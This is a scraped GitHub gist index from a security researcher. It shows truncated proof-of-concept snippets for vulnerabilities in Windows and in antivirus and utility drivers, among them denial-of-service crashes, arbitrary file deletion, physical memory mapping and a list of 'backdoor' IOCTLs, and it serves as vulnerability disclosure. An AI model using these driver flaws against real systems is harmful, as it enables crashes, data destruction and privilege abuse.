Skip to content

Instantly share code, notes, and snippets.

View hfiref0x's full-sized avatar

hfiref0x

4k followers · 19 following
View GitHub Profile
@hfiref0x
hfiref0x / NtCreateIoRing.cpp
Created February 19, 2021 08:12
Denial of Service bug in Windows 10 (21313 build) NtCreateIoRing
#include <Windows.h>
#include <cstdio>
typedef NTSTATUS(NTAPI* pfnNtCreateIoRing)(
ULONG_PTR Param1,
ULONG_PTR Param2,
ULONG_PTR Param3,
ULONG_PTR Param4
);
@hfiref0x
hfiref0x / fusion.c
Created September 13, 2020 03:23
#include <fusion.h>
typedef HRESULT(WINAPI* pfnCreateAssemblyEnum)(
_Out_ IAssemblyEnum** pEnum,
_In_opt_ IUnknown* pUnkReserved,
_In_opt_ IAssemblyName* pName,
_In_ DWORD dwFlags,
_Reserved_ LPVOID pvReserved);
typedef HRESULT(WINAPI* pfnCreateAssemblyCache)(
@hfiref0x
hfiref0x / enetech_new.c
Created August 12, 2020 12:26
EneTech newest variant (May 2020) unlock, (app+dll)
#include <windows.h>
#include <cstdio>
#include "ntos.h"
#define WINIO_DEVICE_TYPE (DWORD)0x8010
#define WINIO_MAP_FUNCID (DWORD)0x810
#define WINIO_UNMAP_FUNCID (DWORD)0x811
#define IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY \
@hfiref0x
hfiref0x / gist:720e2caf58a770117caa1d51d2745491
Created June 11, 2020 18:30
#pragma warning(disable: 4005)
#include <windows.h>
#include <cstdio>
#include <ntstatus.h>
typedef NTSTATUS (NTAPI *pfnNtCreateEnclave)(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID* BaseAddress,
_In_ ULONG_PTR ZeroBits,
@hfiref0x
hfiref0x / SecureAPlus.c
Created February 28, 2020 05:45
SecureAPlus driver DoS
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
@hfiref0x
hfiref0x / imf.c
Created February 26, 2020 16:33
IObit Malware Fighter ImfObCallback.sys features
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
@hfiref0x
hfiref0x / zam.md
Created February 26, 2020 06:52
MalwareFox ZAM backdoor IOCTL list

ZAM64.SYS (ZAMGUARD64.SYS) most interesting IOCTLs.

All parameters to the functions supplied from user-mode via DeviceIoControl parameters. Everything from this available for any local user on machine where this driver is running.

0x8000202C

Arbitrary file deletion. Resets file attributes via ZwSetInformationFile and then does ZwDeleteFile.

0x80002030

Wrapper around ZwQuerySystemInformation(SystemProcessInformation).

@hfiref0x
hfiref0x / bkavsp.c
Created February 25, 2020 18:35
BKAVSP Arbitrary File Deletion
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
#if defined (_MSC_VER)
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@hfiref0x
hfiref0x / desc.txt
Created February 25, 2020 08:07
SUPERAntispyware backdoor
This is saskutil64.sys 1.0.0.1016 driver of SUPERAntispyware 8.0.0.1050 (current), both Free/Pro editions.
The SaskCallDriver function work with fixed size buffer send from user mode.
This buffer is a structure defined as
#pragma pack(push, 1)
typedef struct _CALL_DRV {
WCHAR DeviceName[2048]; //e.g. \Device\Harddisk0\DR0
LARGE_INTEGER StartingOffset;
SIZE_T DataSize;
PVOID DataPtr; //pointer to user mode allocated buffer of DataSize length.
@hfiref0x
hfiref0x / MaxBSOD.c
Created February 24, 2020 06:50
int main()
{
HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\MaxProc64"),
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);